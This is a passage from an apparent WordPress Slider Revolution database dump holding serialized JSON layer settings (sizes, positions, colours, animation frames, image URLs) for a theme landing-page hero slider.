1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"22px\",\"e\":true},\"n\":{\"v\":\"22px\"},\"t\":{\"v\":\"22px\"},\"m\":{\"v\":\"22px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"lineHeight\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"28px\"},\"t\":{\"v\":\"28px\"},\"m\":{\"v\":\"28px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"20\":{\"text\":\" \",\"alias\":\"Overlay-gradient\",\"uid\":20,\"size\":{\"width\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"height\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\"},\"t\":{\"v\":\"1200px\",\"e\":true},\"m\":{\"v\":\"1300px\",\"e\":true}},\"covermode\":\"fullwidth\",\"originalWidth\":\"100%\",\"originalHeight\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-1100px\",\"e\":true},\"n\":{\"v\":\"-1100px\"},\"t\":{\"v\":\"-1200px\",\"e\":true},\"m\":{\"v\":\"-1300px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":23,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":23,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"15\"},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"customCSS\":\"background:linear-gradient(-0deg, rgba(0,0,0,1)45%, rgba(0,0,0,0));\\n\",\"type\":\"shape\",\"version\":\"6.4.0\"}}','{\"0\":\"\",\"version\":\"6.4.0\"}'),
(2,2,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"rgba(0, 0, 0, 0.5)\",\"image\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/bg-blur.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"\"}},\"thumb\":{\"customThumbSrc\":\"\",\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"panzoom\":{\"ease\":\"none\"},\"version\":\"6.4.0\"}','{\"18\":{\"text\":\"Image 18\",\"alias\":\"3r\",\"uid\":18,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-3-right.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1022px\",\"e\":true},\"n\":{\"v\":\"1022px\"},\"t\":{\"v\":\"1022px\"},\"m\":{\"v\":\"1022px\"}},\"height\":{\"d\":{\"v\":\"538px\",\"e\":true},\"n\":{\"v\":\"538px\"},\"t\":{\"v\":\"538px\"},\"m\":{\"v\":\"538px\"}},\"originalWidth\":1022,\"originalHeight\":538,\"aspectRatio\":{\"d\":{\"v\":1.8996282527881},\"n\":{\"v\":1.8996282527881},\"t\":{\"v\":1.8996282527881},\"m\":{\"v\":1.8996282527881}}},\"position\":{\"x\":{\"d\":{\"v\":\"-309px\",\"e\":true},\"n\":{\"v\":\"-309px\"},\"t\":{\"v\":\"1184px\",\"e\":true},\"m\":{\"v\":\"1184px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-123px\",\"e\":true},\"n\":{\"v\":\"-123px\"},\"t\":{\"v\":\"510px\",\"e\":true},\"m\":{\"v\":\"510px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"3l\",\"uid\":15,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-03-left.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1360px\",\"e\":true},\"n\":{\"v\":\"1360px\"},\"t\":{\"v\":\"1360px\",\"e\":true},\"m\":{\"v\":\"1360px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"795px\",\"e\":true},\"n\":{\"v\":\"795px\"},\"t\":{\"v\":\"795px\",\"e\":true},\"m\":{\"v\":\"795px\",\"e\":true}},\"originalWidth\":1360,\"originalHeight\":795,\"aspectRatio\":{\"d\":{\"v\":1.7106918238994},\"n\":{\"v\":1.7106918238994},\"t\":{\"v\":1.7106918238994},\"m\":{\"v\":1.7106918238994}}},\"position\":{\"x\":{\"d\":{\"v\":\"-341px\",\"e\":true},\"n\":{\"v\":\"-341px\"},\"t\":{\"v\":\"-318px\",\"e\":true},\"m\":{\"v\":\"-318px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-276px\",\"e\":true},\"n\":{\"v\":\"-276px\"},\"t\":{\"v\":\"355px\",\"e\":true},\"m\":{\"v\":\"355px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"17\":{\"text\":\"Image 17\",\"alias\":\"2r\",\"uid\":17,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-02-right.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"917px\",\"e\":true},\"n\":{\"v\":\"917px\"},\"t\":{\"v\":\"917px\",\"e\":true},\"m\":{\"v\":\"917px\"}},\"height\":{\"d\":{\"v\":\"798px\",\"e\":true},\"n\":{\"v\":\"798px\"},\"t\":{\"v\":\"798px\",\"e\":true},\"m\":{\"v\":\"798px\"}},\"originalWidth\":917,\"originalHeight\":798,\"aspectRatio\":{\"d\":{\"v\":1.1491228070175},\"n\":{\"v\":1.1491228070175},\"t\":{\"v\":1.1491228070175},\"m\":{\"v\":1.1491228070175}}},\"position\":{\"x\":{\"d\":{\"v\":\"-135px\",\"e\":true},\"n\":{\"v\":\"-135px\"},\"t\":{\"v\":\"-135px\",\"e\":true},\"m\":{\"v\":\"-135px\"}},\"y\":{\"d\":{\"v\":\"-193px\",\"e\":true},\"n\":{\"v\":\"-193px\"},\"t\":{\"v\":\"-193px\",\"e\":true},\"m\":{\"v\":\"-193px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 